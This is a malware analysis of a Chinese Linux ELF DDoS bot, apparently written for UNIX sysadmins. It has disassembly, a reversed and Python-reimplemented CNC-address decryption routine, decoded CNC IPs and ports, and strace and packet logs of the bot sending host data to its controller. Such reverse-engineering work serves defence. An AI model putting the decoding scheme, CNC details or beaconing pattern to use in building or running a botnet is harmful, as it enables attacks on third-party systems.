- # MalwareMustDie China ELF DDoSer Analysis
- # Sample: 9a2a00f4bba2f3e0b1211a1f0cb48896
- # ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
- # VT: https://www.virustotal.com/en/file/bb4786695774ae7777200a78e56db83ad5d5bdf1c1b84ef86dd796f7c9a3e1b4/analysis/1409687242/
- # Reference1 analysis (x64 base compilation, older version, new dates, CNC: 199.101.117.142)
- https://www.virustotal.com/en/file/8fa44a7b3eb707f584b223792bdb78b1e5f69a40dba20634094077c2f0287bca/analysis/1409730903/
- # Reference2 analysis (same compilation, same CNC IP 61.147.103.21 with a different port number as CNC)
- https://www.virustotal.com/en/file/d2b3ce2195b1422c165faeb1fbbdd098f13df6cf6595fb18f8d618cd78df597c/analysis/1409729124/
- # =============================
- # Binary Analysis
- # =============================
- ELF Header:
- Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
- Class: ELF32
- Data: 2's complement, little endian
- Version: 1 (current)
- OS/ABI: UNIX - System V
- ABI Version: 0
- Type: EXEC (Executable file)
- Machine: Intel 80386
- Version: 0x1
- Entry point address: 0x8048120
- Start of program headers: 52 (bytes into file)
- Start of section headers: 1199680 (bytes into file)
- Flags: 0x0
- Size of this header: 52 (bytes)
- Size of program headers: 32 (bytes)
- Number of program headers: 5
- Size of section headers: 40 (bytes)
- Number of section headers: 28
- Section header string table index: 25
- Section Headers:
- [Nr] Name Type Addr Off Size ES Flg Lk Inf Al
- [ 0] NULL 00000000 000000 000000 00 0 0 0
- [ 1] .note.ABI-tag NOTE 080480d4 0000d4 000020 00 A 0 0 4
- [ 2] .init PROGBITS 080480f4 0000f4 000017 00 AX 0 0 4
- [ 3] .text PROGBITS 08048120 000120 0e3800 00 AX 0 0 32
- [ 4] __libc_freeres_fn PROGBITS 0812b920 0e3920 000f6e 00 AX 0 0 4
- [ 5] __libc_thread_fre PROGBITS 0812c890 0e4890 0000e2 00 AX 0 0 4
- [ 6] .fini PROGBITS 0812c974 0e4974 00001a 00 AX 0 0 4
- [ 7] .rodata PROGBITS 0812c9a0 0e49a0 021eee 00 A 0 0 32
- [ 8] __libc_subfreeres PROGBITS 0814e890 106890 00003c 00 A 0 0 4
- [ 9] __libc_atexit PROGBITS 0814e8cc 1068cc 000004 00 A 0 0 4
- [10] __libc_thread_sub PROGBITS 0814e8d0 1068d0 000004 00 A 0 0 4
- [11] .eh_frame PROGBITS 0814e8d4 1068d4 016d08 00 A 0 0 4
- [12] .gcc_except_table PROGBITS 081655dc 11d5dc 005049 00 A 0 0 4
- [13] .tdata PROGBITS 0816b628 122628 000014 00 WAT 0 0 4
- [14] .tbss NOBITS 0816b63c 12263c 00001c 00 WAT 0 0 4
- [15] .ctors PROGBITS 0816b63c 12263c 00002c 00 WA 0 0 4
- [16] .dtors PROGBITS 0816b668 122668 00000c 00 WA 0 0 4
- [17] .jcr PROGBITS 0816b674 122674 000004 00 WA 0 0 4
- [18] .data.rel.ro PROGBITS 0816b680 122680 00063c 00 WA 0 0 32
- [19] .got PROGBITS 0816bcbc 122cbc 00005c 04 WA 0 0 4
- [20] .got.plt PROGBITS 0816bd18 122d18 00000c 04 WA 0 0 4
- [21] .data PROGBITS 0816bd40 122d40 001034 00 WA 0 0 32
- [22] .bss NOBITS 0816cd80 123d74 0091d8 00 WA 0 0 32
- [23] __libc_freeres_pt NOBITS 08175f58 123d74 000020 00 WA 0 0 4
- [24] .comment PROGBITS 00000000 123d74 000fa5 00 0 0 1
- [25] .shstrtab STRTAB 00000000 124d19 000126 00 0 0 1
- [26] .symtab SYMTAB 00000000 1252a0 018110 10 27 1246 4
- [27] .strtab STRTAB 00000000 13d3b0 03224e 00 0 0 1
- Program Headers:
- Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
- LOAD 0x000000 0x08048000 0x08048000 0x122625 0x122625 R E 0x1000
- LOAD 0x122628 0x0816b628 0x0816b628 0x0174c 0x0a950 RW 0x1000
- NOTE 0x0000d4 0x080480d4 0x080480d4 0x00020 0x00020 R 0x4
- TLS 0x122628 0x0816b628 0x0816b628 0x00014 0x00030 R 0x4
- GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
- Section to Segment mapping:
- Segment Sections...
- 00 .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
- 01 .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
- 02 .note.ABI-tag
- 03 .tdata .tbss
- Notes at offset 0x000000d4, len 0x00000020:
- Owner Data size Description
- GNU 0x00000010 NT_VERSION (version)
- // Notes:
- no dynamic section
- no relocations
- no unwind sections
- # =============================
- # Reversing w/debug PoC
- # =============================
- // start of .text reversed (entry point, for characterisation)
- ;-- section..text:
- 0x08048120 31ed xor ebp, ebp
- 0x08048122 5e pop esi
- 0x08048123 89e1 mov ecx, esp
- 0x08048125 83e4f0 and esp, 0xfffffff0
- 0x08048128 50 push eax
- 0x08048129 54 push esp
- 0x0804812a 52 push edx
- 0x0804812b 68f4c20c08 push sym.__libc_csu_fini ; 0x080cc2f4
- 0x08048130 689cc20c08 push sym.__libc_csu_init ; 0x080cc29c
- 0x08048135 51 push ecx
- 0x08048136 56 push esi
- 0x08048137 681ca70408 push sym.main ; 0x0804a71c
- 0x0804813c e8cf390800 call sym.__libc_start_main
- 0x080cbb10(unk, unk, unk, unk, unk, unk, unk, unk) ; sym.__libc_start_main
- 0x08048141 f4 hlt
- 0x08048142 90 nop
- 0x08048143 90 nop
- // Chinese lang
- .rodata:081301A0 aINZD db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
- 0x00747E0 CUNG5
- 0x007518F CUNG
- 0x0075693 B4CUNG
- 0x0102520 i18n:1999
- :
- // config:
- 0x00E5C22 fake.cfg
- // template:
- %d
- %d.%d.%d.%d:%d.%d.%d.%d
- %d:%d
- // poc:
- # cat fake.cfg
- 0
- YOUR-IP-HERE:AND-HERE
- 10000:60000
- // obtains the local Ethernet IP address, to be written into fake.cfg:
- getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0
- // tests Internet connectivity with a DNS query for www.baidu.com
- 0x00E50FD www.baidu.com
- // PoC:
- sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
- recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74
- // compiler/compatibility traces:
- 0x0124CC0 GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)
- 0x0124CED GCC: (GNU) 4.0.0 20050525 (Red Hat 4.0.0-9)
- // Sources:
- 'crtstuff.c'
- 'Fake.cpp'
- 'Global.cpp'
- 'main.cpp'
- 'Manager.cpp'
- 'ProtocolUtil.cpp'
- 'ServerIP.cpp'
- 'StatBase.cpp'
- 'ThreadAttack.cpp'
- 'ThreadAttackKernal.cpp'
- 'ThreadHostStatus.cpp'
- 'ThreadTaskManager.cpp'
- 'ThreadTimer.cpp'
- 'AutoLock.cpp'
- 'FileOp.cpp'
- 'Log.cpp'
- 'Md5.cpp'
- 'Media.cpp'
- 'NetBase.cpp'
- 'ThreadCondition.cpp'
- 'Thread.cpp'
- 'ThreadMutex.cpp'
- 'Utility.cpp'
- // ThreadAttack.cpp holds the key functions that carry out the
- // attack/offensive malicious activity; its methods are:
- CThreadAttack::ProcessMain(void)
- CThreadAttack::EmptyConnectionAtk(CSubTask &)
- CThreadAttack::HttpAtk(CSubTask &)
- CThreadAttack::FakeUserAtk(CSubTask &)
- CThreadAttack::Stop(void)
- CThreadAttack::DomainInitEx(CRandArray &,char const*)
- CThreadAttack::DomainRandEx(CRandArray &,int &)
- CThreadAttack::CrossPkt(int)
- CThreadAttack::~CThreadAttack()
- CThreadAttack::CThreadAttack(CManager *)
- CThreadAttack::Start(CCmdMessage *)
- CThreadAttack::InitCrossPkts(std::vector<uint,std::allocator<uint>..
- CThreadAttack::PktAtk(CSubTask &,std::vector<uint,std::allocator<..
- // Other attack methods noted besides the DDoS flood; in this build each is an empty stub (prologue, leave, retn):
- 0x805478A ; CThreadAttack::EmptyConnectionAtk(CSubTask &)
- 0x805478A public _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask
- 0x805478A _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask proc near
- 0x805478A push ebp
- 0x805478B mov ebp, esp
- 0x805478D leave
- 0x805478E retn
- 0x805478E
- 0x805478E _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask endp
- 0x8054790 ; CThreadAttack::HttpAtk(CSubTask &)
- 0x8054790 public _ZN13CThreadAttack7HttpAtkER8CSubTask
- 0x8054790 _ZN13CThreadAttack7HttpAtkER8CSubTask proc near
- 0x8054790 push ebp
- 0x8054791 mov ebp, esp
- 0x8054793 leave
- 0x8054794 retn
- 0x8054794
- 0x8054794 _ZN13CThreadAttack7HttpAtkER8CSubTask endp
- 0x8054796 ; CThreadAttack::FakeUserAtk(CSubTask &)
- 0x8054796 public _ZN13CThreadAttack11FakeUserAtkER8CSubTask
- 0x8054796 _ZN13CThreadAttack11FakeUserAtkER8CSubTask proc near
- 0x8054796 push ebp
- 0x8054797 mov ebp, esp
- 0x8054799 leave
- 0x805479A retn
- 0x805479A
- 0x805479A _ZN13CThreadAttack11FakeUserAtkER8CSubTask endp
- // Spawns processes and connects to the CNC (as reversed, 44 processes are spawned for the callbacks):
- :
- 0x80532D2 sub esp, 214h ; Integer Subtraction
- 0x80532D8 lea ecx, [ebp+var_10C] ; Load Effective Address
- 0x80532DE mov edx, offset _ZZN9CServerIP10InitializeEvE4C_48 ; CServerIP::Initialize(void)::C.48 <======
- 0x80532E3 mov eax, 100h
- 0x80532E8 sub esp, 4 ; Integer Subtraction
- 0x80532EB push eax
- 0x80532EC push edx
- 0x80532ED push ecx
- 0x80532EE call memcpy ; Call Procedure
- 0x80532F3 add esp, 10h ; Add
- 0x80532F6 lea ecx, [ebp+var_20C] ; Load Effective Address
- 0x80532FC mov edx, offset _ZZN9CServerIP10InitializeEvE4C_49 ; CServerIP::Initialize(void)::C.49 <======
- 0x8053301 mov eax, 100h
- 0x8053306 sub esp, 4 ; Integer Subtraction
- 0x8053309 push eax
- 0x805330A push edx
- 0x805330B push ecx
- 0x805330C call memcpy ; Call Procedure
- 0x8053311 add esp, 10h ; Add
- 0x8053314 push 27h
- 0x8053316 push offset a7005601212 ; "70/056/012/12" ; <============================
- 0x805331B push 0FFh
- 0x8053320 lea eax, [ebp+var_10C] ; Load Effective Address
- 0x8053326 push eax
- 0x8053327 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char const*,int)
- 0x805332C add esp, 10h ; Add
- 0x805332F push 0Ah
- 0x8053331 push offset a63551; "63551" ; <============================
- 0x8053336 push 0FFh
- 0x805333B lea eax, [ebp+var_20C] ; Load Effective Address
- 0x8053341 push eax
- 0x8053342 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char const
- // Here is the decryption routine used to recover the CNC address:
- 0x8062EF0
- 0x8062EF0 ; CUtility::DeCrypt(char *, int, char const*, int)
- 0x8062EF0 public _ZN8CUtility7DeCryptEPciPKci
- 0x8062EF0 _ZN8CUtility7DeCryptEPciPKci proc near ; CODE XREF: CServerIP::Initialize(void)
- 0x8062EF0 ; CServerIP::Initialize(void)
- 0x8062EF0
- 0x8062EF0 var_4= dword ptr -4
- 0x8062EF0 arg_0= dword ptr 8
- 0x8062EF0 arg_4= dword ptr 0Ch
- 0x8062EF0 arg_8= dword ptr 10h
- 0x8062EF0 arg_C= dword ptr 14h
- 0x8062EF0
- 0x8062EF0 push ebp
- 0x8062EF1 mov ebp, esp
- 0x8062EF3 sub esp, 10h ; Integer Subtraction
- 0x8062EF6 mov [ebp+var_4], 0
- 0x8062EFD jmp short loc_8062F36 ; Jump
- 0x8062EFD
- 0x8062EFF
- 0x8062EFF loc_8062EFF: ; CODE XREF: CUtility::DeCrypt(char *,int,char const*,int)
- 0x8062EFF mov eax, [ebp+var_4]
- 0x8062F02 and eax, 1 ; Logical AND
- 0x8062F05 test al, al ; Logical Compare
- 0x8062F07 jz short loc_8062F1E ; Jump if Zero (ZF=1)
- 0x8062F07
- 0x8062F09 mov eax, [ebp+var_4]
- 0x8062F0C mov edx, eax
- 0x8062F0E add edx, [ebp+arg_0] ; Add
- 0x8062F11 mov eax, [ebp+var_4]
- 0x8062F14 add eax, [ebp+arg_8] ; Add
- 0x8062F17 mov al, [eax]
- 0x8062F19 inc eax ; Increment by 1
- 0x8062F1A mov [edx], al
- 0x8062F1C jmp short loc_8062F31 ; Jump
- 0x8062F1C
- 0x8062F1E
- 0x8062F1E loc_8062F1E: ; CODE XREF: CUtility::DeCrypt(char *,int,char const*,int)
- 0x8062F1E mov eax, [ebp+var_4]
- 0x8062F21 mov edx, eax
- 0x8062F23 add edx, [ebp+arg_0] ; Add
- 0x8062F26 mov eax, [ebp+var_4]
- 0x8062F29 add eax, [ebp+arg_8] ; Add
- 0x8062F2C mov al, [eax]
- 0x8062F2E dec eax ; Decrement by 1
- 0x8062F2F mov [edx], al
- 0x8062F2F
- 0x8062F31
- 0x8062F31 loc_8062F31: ; CODE XREF: CUtility::DeCrypt(char *,int,char const*,int)
- 0x8062F31 lea eax, [ebp+var_4] ; Load Effective Address
- 0x8062F34 inc dword ptr [eax] ; Increment by 1
- 0x8062F34
- 0x8062F36
- 0x8062F36 loc_8062F36: ; CODE XREF: CUtility::DeCrypt(char *,int,char const*,int)
- 0x8062F36 mov eax, [ebp+var_4]
- 0x8062F39 cmp eax, [ebp+arg_C] ; Compare Two Operands
- 0x8062F3C jge short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
- 0x8062F3C
- 0x8062F3E mov eax, [ebp+var_4]
- 0x8062F41 cmp eax, [ebp+arg_4] ; Compare Two Operands
- 0x8062F44 jge short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
- 0x8062F44
- 0x8062F46 mov eax, [ebp+var_4]
- 0x8062F49 add eax, [ebp+arg_8] ; Add
- 0x8062F4C mov al, [eax]
- 0x8062F4E test al, al ; Logical Compare
- 0x8062F50 jnz short loc_8062EFF ; Jump if Not Zero (ZF=0)
- 0x8062F50
- 0x8062F52
- 0x8062F52 locret_8062F52: ; CODE XREF: CUtility::DeCrypt(char *,int,char const*,int)
- 0x8062F52 ; CUtility::DeCrypt(char *,int,char const*,int)
- 0x8062F52 leave ; High Level Procedure Exit
- 0x8062F53 retn ; Return Near from Procedure
- 0x8062F53
- 0x8062F53 _ZN8CUtility7DeCryptEPciPKci endp
- 0x8062F53
- // CNC Decoded:
- 61.147.103.21:54460
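To check the recovered address, here is a Python reimplementation of CUtility::DeCrypt as reversed above; this is added example code, not the malware's source or MalwareMustDie's tooling. The names `decrypt` and `recover_cnc` are my own; the encoded strings and length arguments are the ones pushed in CServerIP::Initialize.

```python
# Mirror of DeCrypt(char *dst, int dst_len, const char *src, int src_len)
# as seen in the disassembly (example code, not the sample's own source):
# loop index i starts at 0; odd positions are incremented by one,
# even positions decremented by one; the loop stops at src_len (arg_C),
# dst_len (arg_4) or the first NUL byte of src, whichever comes first.

def decrypt(src, dst_len=0xFF, src_len=None):
    """Return the decoded bytes of src using the reversed DeCrypt logic."""
    if src_len is None:
        src_len = len(src)
    out = bytearray()
    i = 0
    # loc_8062F36: exit when i >= src_len, i >= dst_len or src[i] == 0
    # (the i < len(src) guard stands in for the C string's NUL terminator)
    while i < src_len and i < dst_len and i < len(src) and src[i] != 0:
        if i & 1:                          # loc_8062EFF: odd index  -> byte + 1
            out.append((src[i] + 1) & 0xFF)
        else:                              # loc_8062F1E: even index -> byte - 1
            out.append((src[i] - 1) & 0xFF)
        i += 1
    return bytes(out)


def recover_cnc(enc_ip, ip_len, enc_port, port_len):
    """Apply the two DeCrypt calls from CServerIP::Initialize and join host:port."""
    host = decrypt(enc_ip, 0xFF, ip_len).decode("ascii")
    port = decrypt(enc_port, 0xFF, port_len).decode("ascii")
    return f"{host}:{port}"


if __name__ == "__main__":
    # Encoded strings and lengths exactly as pushed before each call:
    # push 27h / "70/056/012/12" / 0FFh and push 0Ah / "63551" / 0FFh
    print(recover_cnc(b"70/056/012/12", 0x27, b"63551", 0x0A))
```

Running the same function over the strings of a new build is a quick way to confirm whether it shares this config scheme before firing it up in a sandbox.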
- // PoC-ed:
- connect(3, {sa_family=AF_INET, sin_port=htons(54460), sin_addr=inet_addr("61.147.103.21")}, 16) = -1 EINPROGRESS (flag)
- send(3, "\270\v\0\0\0N.%EN.%E\20'`\352MMD-IS-BANGING-YOU-B1TCH! x.x.x.x"..., 401, 0) = 401
- // Spawned-process PoC (44 rounds with one parent, as reversed)
- Process 17553 detached
- Process 17552 detached
- :
- Process 17593 detached
- Process 17594 detached
- // CNC communication:
- // Two-step communication:
- // 1. opens an HTTP connection to 180.76.3.151:
- socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
- setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
- setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
- fcntl64(3, F_GETFL) = 0x2 (flags O_RDWR)
- fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
- connect(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("180.76.3.151")}, 16) = -1 EINPROGRESS
- x.x.x.x 180.76.3.151 TCP 74 48417 > http [SYN] Seq=0 Win=14600 Len=0 MSS=1460 SACK_PERM=1 TSval=895351513 TSecr=0 WS=128
- 180.76.3.151 x.x.x.x TCP 74 http > 48417 [SYN, ACK] Seq=0 Ack=1 Win=14600 Len=0 MSS=1440 SACK_PERM=1
- x.x.x.x 180.76.3.151 TCP 54 48417 > http [RST] Seq=1 Win=0 Len=0
- // 2. sends the infected machine's data to the CNC:
- x.x.x.x 61.147.103.21 TCP 455 33911 > 54460 [PSH, ACK] Seq=1 Ack=1 Win=14720 Len=401
- 00000000 b8 0b 00 00 00 4e 2e 25 45 4e 2e 25 45 10 27 60 .....N.% EN.%E.**
- 00000010 ea 4c 69 6e 75 78 20 33 2e 32 2e 30 2d 34 2d 61 .Linux 3 .2.0-4-a
- 00000020 6d 64 36 34 00 00 00 00 00 00 00 00 00 00 00 00 md64.... ........
- 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000190 00 .
- ----
- #MalwareMustDie!
- /* This analysis post is dedicated to all UNIX sysadmins */